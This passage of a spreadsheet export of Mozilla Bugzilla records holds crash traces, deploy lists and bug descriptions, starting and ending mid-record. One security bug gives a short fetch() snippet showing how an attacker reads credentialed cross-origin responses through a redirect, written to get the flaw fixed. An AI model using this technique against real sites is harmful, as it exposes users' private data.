  04761080    PPC  16AD410C  NS_GetGlobalComponentManager(nsIComponentManager**)+
0002C
  04761040    PPC  16AC7BB4  NS_InitXPCOM(nsIServiceManager**)+000F0
  04760FD0    PPC  16AD00F0  nsComponentManagerImpl::Init()+0019C
  04760F80    PPC  16AD35BC
nsComponentManagerImpl::AutoRegister(nsIComponentManager::RegistrationTime, const
char*)+0022C
  04760CF0    PPC  16AD3744
nsComponentManagerImpl::SyncComponentsInPathList(const char*)+00094
  04760CA0    PPC  16AD3880  nsComponentManagerImpl::SyncComponentsInDir(const
char*)+000AC
  04760840    PPC  16AD3E10  nsComponentManagerImpl::SyncComponentsInFile(const
char*)+004D0
  047606F0    PPC  16AD406C  nsComponentManagerImpl::SelfRegisterDll(nsDll*)+
0015C
  04760290    PPC  15961EF8  NSRegisterSelf+000D4
  04760210    PPC  16AC6D4C  nsServiceManagerImpl::GetService(const nsID&amp;, const
nsID&amp;, nsISupports**, nsIShutdownListener*)+00118
  04760180    PPC  16AC1880  nsComponentManager::CreateInstance(const nsID&amp;,
nsISupports*, const nsID&amp;, void**)+00024
  04760130    PPC  16AD410C  NS_GetGlobalComponentManager(nsIComponentManager**)+
0002C
  047600F0    PPC  16AC7BB4  NS_InitXPCOM(nsIServiceManager**)+000F0
  04760080    PPC  16AD00F0  nsComponentManagerImpl::Init()+0019C
  04760030    PPC  16AD35BC
nsComponentManagerImpl::AutoRegister(nsIComponentManager::RegistrationTime, const
char*)+0022C
  0475FDA0    PPC  16AD3744
nsComponentManagerImpl::SyncComponentsInPathList(const char*)+00094
  0475FD50    PPC  16AD3880  nsComponentManagerImpl::SyncComponentsInDir(const
char*)+000AC
  0475F8F0    PPC  16AD3E10  nsComponentManagerImpl::SyncComponentsInFile(const
char*)+004D0
  0475F7A0    PPC  16AD406C  nsComponentManagerImpl::SelfRegisterDll(nsDll*)+
0015C
  0475F340    PPC  15961EF8  NSRegisterSelf+000D4
etc.</t>
        </is>
      </c>
      <c r="X4135" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4136">
      <c r="A4136" t="n">
        <v>1623640</v>
      </c>
      <c r="B4136" t="inlineStr">
        <is>
          <t>2020-03-19 07:42:00 -0700</t>
        </is>
      </c>
      <c r="C4136" t="inlineStr">
        <is>
          <t>antenna deploy: 2020.03.19</t>
        </is>
      </c>
      <c r="D4136" t="inlineStr">
        <is>
          <t>2020-03-19 08:20:41 -0700</t>
        </is>
      </c>
      <c r="E4136" t="n">
        <v>1</v>
      </c>
      <c r="F4136" t="n">
        <v>1</v>
      </c>
      <c r="G4136" t="n">
        <v>4</v>
      </c>
      <c r="H4136" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4136" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4136" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K4136" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4136" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4136" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4136" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4136" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4136" t="inlineStr"/>
      <c r="Q4136" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4136" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4136" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4136" t="n">
        <v>1</v>
      </c>
      <c r="U4136" t="n">
        <v>0</v>
      </c>
      <c r="V4136" t="n">
        <v>3</v>
      </c>
      <c r="W4136" t="inlineStr">
        <is>
          <t>We want to do a deploy for `antenna` tagged `2020.03.19`.
It consists of the following:
`96ba1d7`: bug 1618201: remove pubsub (willkg)
`4e6f04b`: bug 1618201: update systemtest to use sqs (willkg)
`3716f33`: bug 1619101: change seamonkey throttle rule to gt 2.53.2 (willkg)
`d482f39`: Clean up documentation (willkg)
`095f628`: Change py.test to pytest (willkg)
`8c3fa5d`: bug 1618201: fix gunicorn worker class to be configurable (willkg)
`c629ea2`: Bump stevedore from 1.31.0 to 1.32.0 (from PR #448) (dependabot-preview[bot])
`be35a77`: Bump botocore from 1.14.9 to 1.15.11 (from PR #449) (dependabot-preview[bot])
`eb2142f`: Bump sphinxcontrib-serializinghtml from 1.1.3 to 1.1.4 (from PR #450) (dependabot-preview[bot])
`cfe51fb`: Bump sphinxcontrib-devhelp from 1.0.1 to 1.0.2 (from PR #451) (dependabot-preview[bot])
`d99c463`: Bump datadog from 0.33.0 to 0.34.1 (from PR #452) (dependabot-preview[bot])
`b5cea81`: Bump sphinxcontrib-applehelp from 1.0.1 to 1.0.2 (from PR #453) (dependabot-preview[bot])
`2d48126`: Bump s3transfer from 0.3.2 to 0.3.3 (from PR #455) (dependabot-preview[bot])
`760abf9`: Bump sphinxcontrib-htmlhelp from 1.0.2 to 1.0.3 (from PR #456) (dependabot-preview[bot])
`a363157`: Bump jmespath from 0.9.4 to 0.9.5 (from PR #458) (dependabot-preview[bot])
`17affd7`: Bump requests from 2.22.0 to 2.23.0 (from PR #459) (dependabot-preview[bot])
`3586928`: Bump gitdb2 from 2.0.6 to 4.0.2 (from PR #461) (dependabot-preview[bot])
`d0e6937`: Bump idna from 2.8 to 2.9 (from PR #463) (dependabot-preview[bot])
`92c5cba`: Bump urlwait from 0.4 to 1.0 (from PR #462) (dependabot-preview[bot])
`31c0662`: Bump boto3 from 1.11.9 to 1.12.11 (from PR #464) (dependabot-preview[bot])
`0ddc3a8`: Bump regex from 2020.1.8 to 2020.2.20 (from PR #466) (dependabot-preview[bot])
`5c26c84`: Bump smmap2 from 2.0.5 to 3.0.1 (from PR #467) (dependabot-preview[bot])
`82aa138`: Bump zipp from 2.1.0 to 3.0.0 (from PR #469) (dependabot-preview[bot])
`b4fff2e`: Bump freezegun from 0.3.14 to 0.3.15 (from PR #470) (dependabot-preview[bot])
`dfdd8bc`: Bump decorator from 4.4.1 to 4.4.2 (from PR #471) (dependabot-preview[bot])
`e03964f`: Bump sphinxcontrib-qthelp from 1.0.2 to 1.0.3 (from PR #472) (dependabot-preview[bot])
`619e819`: Bump sphinxcontrib-websupport from 1.1.2 to 1.2.0 (from PR #474) (dependabot-preview[bot])
`b9a6255`: Bump gitpython from 3.0.5 to 3.1.0 (from PR #475) (dependabot-preview[bot])
`55ea974`: Bump python from 3.8.1-slim to 3.8.2-slim in /docker (from PR #476) (dependabot-preview[bot])
`171842f`: Bump sphinx from 2.3.1 to 2.4.4 (from PR #479) (dependabot-preview[bot])
`124040a`: Add gitdb and smmap constraints (willkg)
`6cedbc0`: Bump sphinxcontrib-serializinghtml from 1.1.3 to 1.1.4 (from PR #450) (dependabot-preview[bot])
`38fb101`: Bump datadog from 0.34.1 to 0.35.0 (from PR #484) (dependabot-preview[bot])
`32f3ec3`: Bump boto3 from 1.12.11 to 1.12.22 (from PR #485) (dependabot-preview[bot])
`4ebaf81`: Bump botocore from 1.15.11 to 1.15.22 (from PR #486) (dependabot-preview[bot])
`5b17802`: Bump zipp from 3.0.0 to 3.1.0 (from PR #487) (dependabot-preview[bot])</t>
        </is>
      </c>
      <c r="X4136" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4137">
      <c r="A4137" t="n">
        <v>1118033</v>
      </c>
      <c r="B4137" t="inlineStr">
        <is>
          <t>2015-01-05 15:23:22 -0800</t>
        </is>
      </c>
      <c r="C4137" t="inlineStr">
        <is>
          <t>Api: Return helpfulness when marking questions and answers as helpful.</t>
        </is>
      </c>
      <c r="D4137" t="inlineStr">
        <is>
          <t>2015-01-14 12:49:56 -0800</t>
        </is>
      </c>
      <c r="E4137" t="n">
        <v>1</v>
      </c>
      <c r="F4137" t="n">
        <v>1</v>
      </c>
      <c r="G4137" t="n">
        <v>5</v>
      </c>
      <c r="H4137" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4137" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4137" t="inlineStr">
        <is>
          <t>Questions</t>
        </is>
      </c>
      <c r="K4137" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4137" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4137" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4137" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4137" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4137" t="inlineStr">
        <is>
          <t>u=api c=questions p=1 s=2015.1</t>
        </is>
      </c>
      <c r="Q4137" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4137" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4137" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4137" t="n">
        <v>1</v>
      </c>
      <c r="U4137" t="n">
        <v>0</v>
      </c>
      <c r="V4137" t="n">
        <v>5</v>
      </c>
      <c r="W4137" t="inlineStr">
        <is>
          <t>Currently the mark as helpful APIs return an empty response. Instead it would be useful to return an object detailing the new helpfulness of the object.</t>
        </is>
      </c>
      <c r="X4137" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4138">
      <c r="A4138" t="n">
        <v>480415</v>
      </c>
      <c r="B4138" t="inlineStr">
        <is>
          <t>2009-02-26 14:38:56 -0800</t>
        </is>
      </c>
      <c r="C4138" t="inlineStr">
        <is>
          <t>Timeouts when submitting a Knowledge Base article on SUMO</t>
        </is>
      </c>
      <c r="D4138" t="inlineStr">
        <is>
          <t>2011-01-03 12:29:58 -0800</t>
        </is>
      </c>
      <c r="E4138" t="n">
        <v>1</v>
      </c>
      <c r="F4138" t="n">
        <v>1</v>
      </c>
      <c r="G4138" t="n">
        <v>5</v>
      </c>
      <c r="H4138" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4138" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4138" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K4138" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4138" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4138" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4138" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4138" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4138" t="inlineStr"/>
      <c r="Q4138" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4138" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4138" t="inlineStr">
        <is>
          <t>1.6</t>
        </is>
      </c>
      <c r="T4138" t="n">
        <v>1</v>
      </c>
      <c r="U4138" t="n">
        <v>0</v>
      </c>
      <c r="V4138" t="n">
        <v>88</v>
      </c>
      <c r="W4138" t="inlineStr">
        <is>
          <t>NOTE: seeing this on production as well as staging
Steps to Reproduce:
1. Log in to SUMO and load https://support-stage.mozilla.org/en-US/kb/Creating+articles
2. Type something in the "Quick edit an article" textfield and click "Edit"
3. When the page loads (something like https://support-stage.mozilla.org/tiki-editpage.php?page=Hotdogs), type some stuff into the "Edit:" field and the "Edit Summary:" field
4. Click "Save"
Expected Results:
The article is created
Actual Results:
Page Load Error: connect reset
(See screenshot.)</t>
        </is>
      </c>
      <c r="X4138" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4139">
      <c r="A4139" t="n">
        <v>470570</v>
      </c>
      <c r="B4139" t="inlineStr">
        <is>
          <t>2008-12-20 10:52:28 -0800</t>
        </is>
      </c>
      <c r="C4139" t="inlineStr">
        <is>
          <t>Switch away from CVS to Bazaar (bzr)</t>
        </is>
      </c>
      <c r="D4139" t="inlineStr">
        <is>
          <t>2010-02-01 16:17:40 -0800</t>
        </is>
      </c>
      <c r="E4139" t="n">
        <v>1</v>
      </c>
      <c r="F4139" t="n">
        <v>1</v>
      </c>
      <c r="G4139" t="n">
        <v>4</v>
      </c>
      <c r="H4139" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4139" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4139" t="inlineStr">
        <is>
          <t>bugzilla.org</t>
        </is>
      </c>
      <c r="K4139" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4139" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4139" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4139" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4139" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4139" t="inlineStr"/>
      <c r="Q4139" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4139" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4139" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4139" t="n">
        <v>1</v>
      </c>
      <c r="U4139" t="n">
        <v>1</v>
      </c>
      <c r="V4139" t="n">
        <v>23</v>
      </c>
      <c r="W4139" t="inlineStr">
        <is>
          <t>(Please note: This bug is not the place to discuss the merits of this proposal, I will start a thread on developers@ for that.)
So, I'd like the Bugzilla Project to switch to using some modern VCS system, and get away from CVS.
The modern VCS feature that I most-frequently want is atomic directory and file renames. Basically, this would mean that we could rename a file during a patch, but the diff would still only show the changes that we made to the file.
There are also a LOT of other advantages to using a modern VCS. People can make local branches (great for customizations and major projects), merging in changes to customized releases is much easier, server-side administration is way easier, you can check out through HTTP (handy if you're behind a firewall), there are way more useful commands (compare "bzr status" to "cvs status")--the list just goes on and on.
So, when talking about modern VCS systems, there are really only three serious choices--git, mercurial, and bzr.
git is very powerful, but enormously cryptic (even though it's less cryptic than it used to be). It also has a heavy focus on Linux development with the Windows support being not as good.
So then we want to compare Mercurial and Bazaar. Mercurial is fine, but not quite as featureful as bzr, I believe, and bzr is developed a lot faster--bzr has more new major releases more frequently than any other piece of software I use. Also, Everything Solved (my company) and Mozilla have been using bzr for Bugzilla work for a long time now, and we have a lot of experience with bzr.
The only real reason to go with Mercurial would be to re-use the current Mozilla infrastructure around it. However, I think we'd actually rather control the list of committers ourselves, though we'd still want them to sign the Mozilla Committers Agreement and all, and have the Foundation deal with the legal aspects. Also, I probably have more experience running a bzr server than anybody at Mozilla.
The move would preseve our entire history--that is, every commit to every branch would be available in bzr.
I talked to justdave about the move, and he's fine with it, as long as we set up a bzr-&gt;cvs mirror, so that people who checked out of CVS, or who are still using a tarball from one of our releases, can "cvs up" to get updates.
So, as near as I can tell, the process for going forward would be:
1. Set up a basic bzr.bugzilla.org as a mirror of CVS.
2. Install loggerhead (a bzr repository browser) on bzr.bugzilla.org.
3. Investigate a bzr-&gt;cvs mirror, and prepare to set it up.
4. Update bonsai links on www.bugzilla.org to point to loggerhead instead 
   of bonsai.
5. Close down CVS to commits.
6. Fix the bzr import (it has a few tiny errors that need to be fixed
   once we start using it as our main repo, and these errors can't be
   fixed as long as it's a mirror of CVS, due to the way the importer works).
7. Tag all the old releases in bzr using "bzr tag" (also something I
   I think we can't do as long as we're a mirror of CVS).</t>
        </is>
      </c>
      <c r="X4139" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4140">
      <c r="A4140" t="n">
        <v>102798</v>
      </c>
      <c r="B4140" t="inlineStr">
        <is>
          <t>2001-10-02 17:38:52 -0700</t>
        </is>
      </c>
      <c r="C4140" t="inlineStr">
        <is>
          <t>Security issue for simple MAPI</t>
        </is>
      </c>
      <c r="D4140" t="inlineStr">
        <is>
          <t>2008-07-31 01:25:05 -0700</t>
        </is>
      </c>
      <c r="E4140" t="n">
        <v>1</v>
      </c>
      <c r="F4140" t="n">
        <v>1</v>
      </c>
      <c r="G4140" t="n">
        <v>3</v>
      </c>
      <c r="H4140" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4140" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J4140" t="inlineStr">
        <is>
          <t>Simple MAPI</t>
        </is>
      </c>
      <c r="K4140" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4140" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4140" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N4140" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4140" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4140" t="inlineStr">
        <is>
          <t>[PDT+]</t>
        </is>
      </c>
      <c r="Q4140" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4140" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4140" t="inlineStr">
        <is>
          <t>mozilla1.0.1</t>
        </is>
      </c>
      <c r="T4140" t="n">
        <v>1</v>
      </c>
      <c r="U4140" t="n">
        <v>0</v>
      </c>
      <c r="V4140" t="n">
        <v>49</v>
      </c>
      <c r="W4140" t="inlineStr">
        <is>
          <t>Tiantian,
As noted on http://support.microsoft.com/support/kb/articles/Q291/3/87.ASP one
of the typical attacks against Outlook / Outlook Express is to use the Simple
MAPI feature to send mail as the user.  All of the recent high profile viruses,
such as Nimda, I Love You, etc., have involved this approach.
The default setting in Outlook Express 6 is to throw a dialog asking the user if
they actually want to send an email whenever another application tries to do this:
"By default, Outlook Express 6 prevents e-mail messages from being sent
programmatically from Outlook Express without your knowledge by displaying a
dialog that enables you to send or not send the message."
I wanted to confirm that, if our Simple MAPI implementation allows other apps to
send email, we have a similar notification mechanism to ensure that users are
aware when it is happening.
Please let me know if we have this safety feature.  If we do not, are we exposed
to this kind of attack?
Thanks,
Dave.
-- 
Dave Barrowman
barrowma@netscape.com
============================
Hi, Dave:
Thanks so much for sharing this information with our team.
We'll deal with this issue at the 2nd stage of the simple MAPI project.</t>
        </is>
      </c>
      <c r="X4140" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4141">
      <c r="A4141" t="n">
        <v>1212669</v>
      </c>
      <c r="B4141" t="inlineStr">
        <is>
          <t>2015-10-07 17:13:27 -0700</t>
        </is>
      </c>
      <c r="C4141" t="inlineStr">
        <is>
          <t>released fetch() allows full access to body on credentialed cross-origin no-cors request redirected from same-origin to cross-origin URL</t>
        </is>
      </c>
      <c r="D4141" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E4141" t="n">
        <v>1</v>
      </c>
      <c r="F4141" t="n">
        <v>1</v>
      </c>
      <c r="G4141" t="n">
        <v>3</v>
      </c>
      <c r="H4141" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4141" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4141" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4141" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4141" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4141" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4141" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4141" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4141" t="inlineStr">
        <is>
          <t>[Only needs to land on beta and release][adv-main41+][adv-esr38.3+]</t>
        </is>
      </c>
      <c r="Q4141" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4141" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4141" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T4141" t="n">
        <v>1</v>
      </c>
      <c r="U4141" t="n">
        <v>0</v>
      </c>
      <c r="V4141" t="n">
        <v>61</v>
      </c>
      <c r="W4141" t="inlineStr">
        <is>
          <t>In bug 1184607 I found and fixed a fetch() redirect problem:
  When fetch() is redirected from same-origin to cross-origin, it did not perform response tainting.
At the time I just fixed this in order to make progress on my current task, but Jonas points out this is a serious security flaw.  It means any attacker can do this:
  fetch(sameOriginRedirectorURL, {
    mode: 'no-cors',
    credentials: 'include'
  });
And get a basic Response with full access to the body.  If its redirecting to your bank for instance, this is quite bad.
We should uplift a modified version of bug 1184607 P6 to at least beta.  We should also consider a chemspill.</t>
        </is>
      </c>
      <c r="X4141" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4142">
      <c r="A4142" t="n">
        <v>487521</v>
      </c>
      <c r="B4142" t="inlineStr">
        <is>
          <t>2009-04-08 15:45:00 -0700</t>
        </is>
      </c>
      <c r="C4142" t="inlineStr">
        <is>
          <t>Do Firefox major update from 2.0.0.20 to 3.0.10</t>
        </is>
      </c>
      <c r="D4142" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4142" t="n">
        <v>1</v>
      </c>
      <c r="F4142" t="n">
        <v>1</v>
      </c>
      <c r="G4142" t="n">
        <v>5</v>
      </c>
      <c r="H4142" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4142" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4142" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4142" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4142" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4142" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4142" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4142" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4142" t="inlineStr"/>
      <c r="Q4142" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4142" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4142" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4142" t="n">
        <v>1</v>
      </c>
      <c r="U4142" t="n">
        <v>0</v>
      </c>
      <c r="V4142" t="n">
        <v>11</v>
      </c>
      <c r="W4142" t="inlineStr">
        <is>
          <t>Assuming this is going to get tested while 3.0.9 is on the beta channel. Waiting on buildID's for 3.0.9 build 2 at this point.</t>
        </is>
      </c>
      <c r="X4142" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4143">
      <c r="A4143" t="n">
        <v>583225</v>
      </c>
      <c r="B4143" t="inlineStr">
        <is>
          <t>2010-07-30 05:59:08 -0700</t>
        </is>
      </c>
      <c r="C4143" t="inlineStr">
        <is>
          <t>We use the wrong DOMCI for DocumentFragment</t>
        </is>
      </c>
      <c r="D4143" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E4143" t="n">
        <v>1</v>
      </c>
      <c r="F4143" t="n">
        <v>1</v>
      </c>
      <c r="G4143" t="n">
        <v>3</v>
      </c>
      <c r="H4143" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4143" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4143" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4143" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4143" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4143" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4143" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4143" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4143" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4143" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4143" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4143" t="inlineStr">
        <is>
          <t>mozilla2.0b3</t>
        </is>
      </c>
      <c r="T4143" t="n">
        <v>1</v>
      </c>
      <c r="U4143" t="n">
        <v>0</v>
      </c>
      <c r="V4143" t="n">
        <v>22</v>
      </c>
      <c r="W4143" t="inlineStr">
        <is>
          <t>We use the wrong DOM classinfo for DocumentFragment nodes (nsDOMGenericSH instead of nsNodeSH). This means we don't force the parent of the DocumentFragment nodes to be their ownerDocument. If the ownerDocument is reparented then the wrapper for the ownerDocument and the DocumentFragment node end up in different XPCWrappedNativeScopes. If then at some point we forcibly try to reparent the wrapper for the DocumentFragment node (for example through adoptNode) we try to remove the wrapper from the XPCWrappedNativeScope of the ownerDocument's wrapper, but we don't find it there. We then add the wrapper to a different XPCWrappedNativeScope and so the wrapper is now in two XPCWrappedNativeScopes. When the wrapper is then destroyed it remove itself from one of the two XPCWrappedNativeScopes, but we end up with a stale reference to it in the other XPCWrappedNativeScope. At some point we'll enumerate the wrapper in all the scopes and hit the stale reference.
It looks like this might lead to several different crashes. One is in WrappedNativeMarker (bug 520554). I've also seen it crash in WrappedNativeTearoffSweeper, and crashes in XPCWrappedNative::IsValid (no bug) and XPCWrappedNativeScope::TraceJS (bug 537822) look suspicious too.
This looks a lot like the Pwn2Own 2010 bug (bug 555109), with a slightly different cause.</t>
        </is>
      </c>
      <c r="X4143" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4144">
      <c r="A4144" t="n">
        <v>939383</v>
      </c>
      <c r="B4144" t="inlineStr">
        <is>
          <t>2013-11-15 20:43:34 -0800</t>
        </is>
      </c>
      <c r="C4144" t="inlineStr">
        <is>
          <t>Quicklinks / Subnav overflowing into footer</t>
        </is>
      </c>
      <c r="D4144" t="inlineStr">
        <is>
          <t>2020-05-30 08:21:19 -0700</t>
        </is>
      </c>
      <c r="E4144" t="n">
        <v>1</v>
      </c>
      <c r="F4144" t="n">
        <v>1</v>
      </c>
      <c r="G4144" t="n">
        <v>6</v>
      </c>
      <c r="H4144" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4144" t="inlineStr">
        <is>
          <t>developer.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J4144" t="inlineStr">
        <is>
          <t>Design</t>
        </is>
      </c>
      <c r="K4144" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4144" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4144" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4144" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4144" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4144" t="inlineStr">
        <is>
          <t>[mentor=davidwalsh]</t>
        </is>
      </c>
      <c r="Q4144" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4144" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4144" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4144" t="n">
        <v>1</v>
      </c>
      <c r="U4144" t="n">
        <v>0</v>
      </c>
      <c r="V4144" t="n">
        <v>10</v>
      </c>
      <c r="W4144" t="inlineStr">
        <is>
          <t>Steps to reproduce:
1. Create a new page with this source, or any other source with short
   content, a long Subnav, and a long quicklinks section:
   http://pastebin.mozilla.org/3613473
Actual:
http://i.imgur.com/cSPjkhH.png
Expected:
The page should be at least as long as the sidebar.</t>
        </is>
      </c>
      <c r="X4144" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4145">
      <c r="A4145" t="n">
        <v>990247</v>
      </c>
      <c r="B4145" t="inlineStr">
        <is>
          <t>2014-03-31 13:55:28 -0700</t>
        </is>
      </c>
      <c r="C4145" t="inlineStr">
        <is>
          <t>Conditional jump or move depends on uninitialised value(s) and Use of uninitialised value of size 4 [@ dosprintf]</t>
        </is>
      </c>
      <c r="D4145" t="inlineStr">
        <is>
          <t>2016-06-04 15:33:44 -0700</t>
        </is>
      </c>
      <c r="E4145" t="n">
        <v>1</v>
      </c>
      <c r="F4145" t="n">
        <v>1</v>
      </c>
      <c r="G4145" t="n">
        <v>3</v>
      </c>
      <c r="H4145" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4145" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4145" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K4145" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4145" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4145" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4145" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4145" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
